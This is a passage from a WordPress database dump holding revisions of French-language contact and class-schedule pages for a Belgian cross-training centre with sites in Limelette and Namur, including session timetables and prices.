. 12</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Laissez-nous un message :</h1>\r\n<p style=\"text-align: center;\">[contact-form-7 id=\"257\" title=\"Contact form 1\"]</p>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 10:14:15', '2013-11-03 10:14:15', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(439, 1, '2013-11-03 10:16:46', '2013-11-03 10:16:46', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n<h1></h1>\r\n<h1></h1>\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 10:16:46', '2013-11-03 10:16:46', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(438, 1, '2013-11-03 10:16:13', '2013-11-03 10:16:13', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1 style=\"text-align: left;\">Laissez-nous un message :</h1>\r\n<p style=\"text-align: left;\">[contact-form-7 id=\"257\" title=\"Contact form 1\"]</p>\r\n\r\n<h1></h1>\r\n<h1></h1>\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1 style=\"text-align: left;\">Prise de RDV :</h1>\r\n<p style=\"text-align: left;\">Les prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12</p>\r\n\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 10:16:13', '2013-11-03 10:16:13', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(445, 1, '2013-11-03 10:24:40', '2013-11-03 10:24:40', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 10:24:40', '2013-11-03 10:24:40', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(440, 1, '2013-11-03 10:18:37', '2013-11-03 10:18:37', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>&nbsp;</h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Les séances', '', 'inherit', 'open', 'open', '', '385-revision-v1', '', '', '2013-11-03 10:18:37', '2013-11-03 10:18:37', '', 385, 'http://www2.crosstrainingcenter.be/385-revision-v1/', 0, 'revision', '', 0),
(453, 1, '2013-11-04 17:05:51', '2013-11-04 17:05:51', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-04 17:05:51', '2013-11-04 17:05:51', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(441, 1, '2013-11-03 10:20:13', '2013-11-03 10:20:13', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '383-revision-v1', '', '', '2013-11-03 10:20:13', '2013-11-03 10:20:13', '', 383, 'http://www2.crosstrainingcenter.be/383-revision-v1/', 0, 'revision', '', 0),
(442, 1, '2013-11-03 10:20:52', '2013-11-03 10:20:52', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-03 